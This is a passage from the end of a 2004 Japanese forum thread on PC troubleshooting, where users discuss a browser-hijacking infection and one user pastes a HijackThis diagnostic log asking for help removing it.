とっとと帰れチンカス。

982 :ひよこ名無しさん:04/05/24 22:42 ID:???
>>939
スレ違いだが、調べて見たらかなり凶悪なようです。
検出されるJB系ウイルス:MHTMLRedir.Exploit(情報はすぐ下のURL)
ttp://www.symantec.com/region/jp/sarcj/data/m/mhtmlredir.exploit.html
検出されるトロイ:Trojan Horse + JS.Downloader.Trojan
レジストリ改変:63

他にもかなりいじられたらしくレスポンス低下してます。
修復にいってきます。みなさんもお気をつけください。

983 :ひよこ名無しさん:04/05/24 22:43 ID:???
>>980
独り言言ってないで、自分宛のレスちゃんと読め>>969
961さんに失礼だろ

984 :ひよこ名無しさん:04/05/24 22:44 ID:???
>>982
乙です

985 :ひよこ名無しさん:04/05/24 22:47 ID:Lfw78Nvj
school-fuck.comというところに飛ばされてしまいます。
HijackThis.exeで怪しいのを消して再起動しても、
デフォルトのページを書き換えられてしまいます。
hijackthis.logをあげますので、削除するところを
教えてください。

------------------------------------

Logfile of HijackThis v1.97.7
Scan saved at 22:19:16, on 2004/05/24
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\System32\cisvc.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\System32\WBEM\WinMgmt.exe

986 :ひよこ名無しさん:04/05/24 22:48 ID:Lfw78Nvj
C:\WINNT\System32\mspmspsv.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\BRMFRSMG.EXE
C:\WINNT\Explorer.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINNT\system32\Promon.exe
C:\WINNT\system32\IEXPLORE.EXE
C:\WINNT\system32\internat.exe
C:\Program Files\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
C:\WINNT\System32\cidaemon.exe
C:\WINNT\system32\conime.exe
C:\Program Files\Trend Micro\Virus Buster 2003\tmproxy.exe
C:\Program Files\Trend Micro\Virus Buster 2003\PCCCLIENT.EXE
C:\WINNT\system32\imejpmgr.exe
C:\Program Files\Trend Micro\Virus Buster 2003\TMOAgent.exe
C:\Program Files\Trend Micro\Virus Buster 2003\POP3TRAP.EXE
C:\Documents and Settings\xxxx\デスクトップ\新しいフォルダ\HijackThis.exe


987 :920:04/05/24 22:49 ID:OR9h1qgk
>>983教えてもらう立場なんですが、ローカル環境じゃないところのを言われても…
既に>>933でご教授あったようにレジストリはfixしてあるので。
コマンドプロンプトから無事削除できました。
ありがとう。これから再起動してみます。

988 :ひよこ名無しさん:04/05/24 22:52 ID:Lfw78Nvj

F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
N1 - Netscape 4: user_pref("browser.startup.homepage", "http://www.google.com/"); (C:\Program Files\Netscape\Users\XXXX\prefs.js)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Acrobat\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {C56CB6B0-0D96-11D6-8C65-B2868B609932} - C:\Program Files\Xi\Net Transport\NTIEHelper.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINNT\System32\spool\drivers\w32x86\3\hpztsb01.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2003\pccguide.exe"
O4 - HKLM\..\Run: [PCCClient.exe] "C:\Program Files\Trend Micro\Virus Buster 2003\PCCClient.exe"
O4 - HKLM\..\Run: [Pop3trap.exe] "C:\Program Files\Trend Micro\Virus Buster 2003\Pop3trap.exe"
O4 - HKLM\..\Run: [TM Outbreak Agent] "C:\Program Files\Trend Micro\Virus Buster 2003\TMOAgent.exe" /run
O4 - HKLM\..\Run: [Promon.exe] Promon.exe
O4 - HKLM\..\Run: [Microsoft Internet Explorer] C:\WINNT\system32\IEXPLORE.EXE
O4 - HKCU\..\Run: [Internat.exe] internat.ex

989 :ひよこ名無しさん:04/05/24 22:53 ID:Lfw78Nvj
O4 - Startup: NTUSER.DAT
O4 - Startup: NTUSER.DAT.LOG
O4 - Startup: ntuser.ini
O4 - Startup: ~
O4 - Startup: AdobeWeb.log
O4 - Startup: dpusys.ini
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O4 - Global Startup: ntuser.pol
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: Backward &Links - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Cac&hed Snapshot of Page - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: Net Transportでダウンロード - C:\PROGRA~1\XI\NETTRA~1\NTAddLink.html
O8 - Extra context menu item: Si&milar Pages - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: 全てをNet Transportでダウンロード - C:\PROGRA~1\XI\NETTRA~1\NTAddList.html
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{12204733-B601-42C3-A855-FB347A0CDE1F}: NameServer = 202.238.95.24,202.238.95.26
O17 - HKLM\System\CS1\Services\Tcpip\..\{12204733-B601-42C3-A855-FB347A0CDE1F}: NameServer = 202.238.95.24,202.238.95.26
O17 - HKLM\System\CS2\Services\Tcpip\..\{12204733-B601-42C3-A855-FB347A0CDE1F}: NameServer = 202.238.95.24,202.238.95.26


990 :だれか次スレを:04/05/24 22:59 ID:???
テンプレ案 >>904-908 + 修正 >>938


991 :920:04/05/24 23:19 ID:OR9h1qgk
なんとか全て元に戻せたようです。みんなありがとう。
そもそもの原因がスポーチーなアメリカナイズされたエロが突然見たくなったことでした。
いやー参った参った。
解決しました。

992 :ひよこ名無しさん:04/05/24 23:20 ID:???
新スレたててきます。
書き込み控えてください。

993 :ひよこ名無しさん:04/05/24 23:21 ID:???
最近コピペだけでスレが埋まるな

994 :ひよこ名無しさん:04/05/24 23:24 ID:???
立ててきたよ。
http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/

995 :ひよこ名無しさん:04/05/24 23:28 ID:???
>>994


996 :ひよこ名無しさん:04/05/24 23:40 ID:???
埋め

997 :ひよこ名無しさん:04/05/24 23:40 ID:???
同じく埋め

998 :ひよこ名無しさん:04/05/24 23:41 ID:???
998

999 :ひよこ名無しさん:04/05/24 23:42 ID:???
1000?

1000 :ひよこ名無しさん:04/05/24 23:42 ID:???
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

372 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)